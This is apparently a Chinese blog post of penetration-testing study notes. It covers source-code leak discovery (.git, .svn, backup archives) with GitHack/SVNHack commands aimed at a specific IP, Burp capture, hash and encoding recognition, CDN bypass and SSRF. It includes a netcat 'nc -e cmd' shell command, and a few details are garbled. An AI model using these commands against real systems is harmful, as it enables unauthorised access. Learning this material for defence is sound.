网络空间安全笔记

汇总一下这几天的笔记

名词解释

POC 漏洞证明代码 EXP(Exploit)利用,利用漏洞进行攻击的动作 Payload有效载荷,指成功exploit之后真正在目标系统执行的代码或指令(shellcode是payload的一种)

公网ip与内网ip

公网IP

公网ip全球唯一,是由网络供应商分配的外网地址,可以直接访问互联网,但是安全风险大,访问速度快而稳定

内网IP

内网IP是在私有网络范围内路由器和使用,通常由路由器和交换机分配,需要用网络地址转换(NAT)来访问互联网资源

思路

1.给你的目标bbs.lkd.com尝试对服务下的edu.lkd.com进行安全测试 2.www.baidu.com dz论坛 www.baidu.com/blog wp程序 www.baidu.com:5050 zblog程序 一个网站 两个程序 任何一个程序出现漏洞 都可以进入安全测试 源码获取很重要

源码获取

CMS识别(云悉指纹识别平台)

其中有网页系统模板,可得到某些网站源码(云悉互联网WEB资产在线梳理)

备份文件泄露

www.zip www.rar ../是用来访问文件父目录(前提是在../在源码中能别执行) C: │ └───Users │ └───YourName │ ├───Documents │ └───Project │ └───Downloads 如果你在 Project 目录中,并且想要访问 Downloads 目录,你可以使用以下路径:../Downloads 在Web开发中,../ 也用于构建URL路径。例如,如果你的Web服务器的根目录是 /var/www/html,并且你想要从子目录 /images 访问根目录下的 index.html 文件,你可以在URL中使用 ../http://example.com/images/../index.html

git源码泄露

在执行git init初始化目录时,会在当前目录下自动创建一个.git目录用来记录代码的变更记录 在网站域名后加/.git/出现403说明此目录存在,可用githack扫描

Githack

用cmd转到Githack目录输入Githack.py http://121.36.49.234/.git/

.svn泄露

SVN是一个开放源代码的版本控制系统 ,在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息可利用/.svn/entries文件获取服务器源码

SVNHack漏洞利用工具

用cmd转到SVNHack目录输入svnhack.py -u http://121.36.49.234/.svn/entries --download

Netcat

nc -lvvp 127.0.0.1 8080 监听自己的8080端口 nc -e cmd 127.0.0.1 8080 打开127.0.0.1:8080的cmd

Ping

可通过TTL值判断操作系统种类 Linux是64或255 Windows是32或128 UNIX是255 TTL值离哪个值近就是哪个操作系统

封包抓包

抓包封包的区别http与tcp

零散(封包)整体(抓包)的区别,封包能精确到每个操作的数据包,抓包要进行筛选

抓包

抓包应用的资产信息进行安全测试,抓包对象为小程序,APP,桌面应用等;抓包用到不同工具是因为有部分应用不走HTTP/S(用bp,转到网站上进行测试),需要用到全局协议(TCP,用科莱,给IP地址或其他的资产信息,扫IP服务器)抓包

BurpSuit

用户每在网页上做出一定操作都会向服务器发送请求包,burp可以拦截并修改这个请求包,实现理想回显 文件夹4031存在404不存在 文件200存在404不存在 3XX跳转 处置过程 可有可无 5XX内部错误 服务器问题 可有可无 设置代理 -> 运行工具的本地IP端口,可抓包APP,小程序,Web网页(测试其安全性)(一次操作发送一次数据包http协议)

[1]  存在但禁止访问

科来

不需要配置任何东西,抓网络接口(TCP2协议) 游戏APP需要不断发送数据包来维持画面流畅 获取服务器的IP地址用bp抓包

[2]  TCP将数据视为连续的字节流,而不是独立的数据包。

封包

加密解密算法

识别算法编码类型:

  1. 看密文位数

  2. 看密文特征(数字大小写符号)

  3. 看密文存在的地方(Web,数据库,操作系统等应用)

解密

MD5(网站常用加密方式)

32或16位由数字0~9和a-f所组成的字符串 不可逆(解密:枚举 碰撞),解密不能直接通过算法解,尝试生成很多加密或对应明文的字符去枚举

discuz md5(md5(password).salt)

base64(由0-9大小写字母,‘+ /’组成,大小写敏感以”=“结尾)

URL编码由0-9,a-f以%间隔

HEX编码将数据进行十六进制转换,0-9,A-F

JS前端加密

js颜文字 jother jsfuck

js颜文字

颜文字特征:一堆颜文字构成的JS代码,在F12中直接解密执行

jother特征:

只用!+ ( ) [ ] { }这八个字符 可在F12中解密

JSFUCK:

与jother很想,只是少了 { }

后端代码加密

PHP:乱码,头部有信息 .NET: DLL封装代码文件(只能在Windows上跑) Java:JAR CLASS 文件

数据库密文加密:

MYSQL MSSQL等

CDN(内容分发网络)绕过

源站使用CDN向各个地区的CDN发送内容,当地查询的ip是cdn节点IP也起到加速作用,可通过CDN查询以及get-site-ip.com查询ip

漏洞遗留文件

利用phpinfo.php中显示服务器的本地地址(没有内网网卡)

内网网卡

  1. IP地址分配

    • 内网网卡通常被分配一个私有IP地址,这些地址在互联网上不是唯一的,仅在私有网络内部使用。

  2. 网络隔离

    • 内网网卡通常用于隔离内部网络,以保护网络不受外部攻击。

  3. 数据传输

    • 内网网卡负责在局域网内传输数据,如文件共享、打印机共享等。

  4. 网络设备连接

    • 内网网卡可以连接到路由器、交换机、无线接入点等网络设备。

  5. 网络协议支持

    • 内网网卡支持多种网络协议,如TCP/IP、Ethernet、Wi-Fi等。

  6. 安全性

    • 内网网卡可能包含一些安全功能,如虚拟局域网(VLAN)支持,以进一步隔离网络流量。

SSRF漏洞(服务器端请求伪造)

通过对方服务器请求本机上的服务,来获取目标服务器的权限,属于反向链接

SSRF漏洞的原理通常涉及以下几个步骤:

  1. 用户输入

    • 攻击者在Web应用程序的某个输入字段中输入恶意构造的URL。这个URL可能是攻击者想要服务器访问的外部资源。

  2. 应用程序处理

    • 应用程序接收到用户输入后,可能会执行一些操作,如发送HTTP请求、读取远程文件等。如果应用程序没有对输入的URL进行严格的验证和限制,攻击者就可以控制请求的目标。

  3. 服务器端请求

    • 服务器端的应用程序会根据用户输入的URL发起请求。如果应用程序没有正确地处理这个URL,攻击者就可以让服务器执行他们想要的操作。

  4. 数据泄露或服务中断

    • 通过SSRF漏洞,攻击者可以访问内部网络资源、执行未授权的操作、泄露敏感信息,甚至可能导致服务中断。

    SSRF攻击的一些常见形式包括:

    • 内网探测:攻击者可能利用SSRF漏洞来探测内部网络,例如,通过发送请求到内部服务器的特定端口,以确定内部网络的结构和配置。

    • 利用第三方服务:攻击者可能利用SSRF漏洞来执行对第三方服务的攻击,例如,通过发送恶意请求到支付网关,可能导致交易失败或数据泄露。

    • 数据泄露:攻击者可能利用SSRF漏洞来访问和窃取服务器上的敏感数据,例如,通过请求内部API或服务。

主动邮件和网络备案

先在ip查询网站上查网页ip,一般别人网站的邮件都是从真实ip地址发送过来的(可通过忘记密码让服务器向客户端发送邮件),再配合网页最下方的网络备案(京津冀)可知晓服务器IP

CDN绑定(hosts绑定指向访问)

Windows C:\Windows\System32\dricer\etc\hosts

Linux /etc/hosts

在源文件的子目录中有hosts文件,其中详细记录着每个网站对应的ip(域名由hosts决定)

  • 54
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值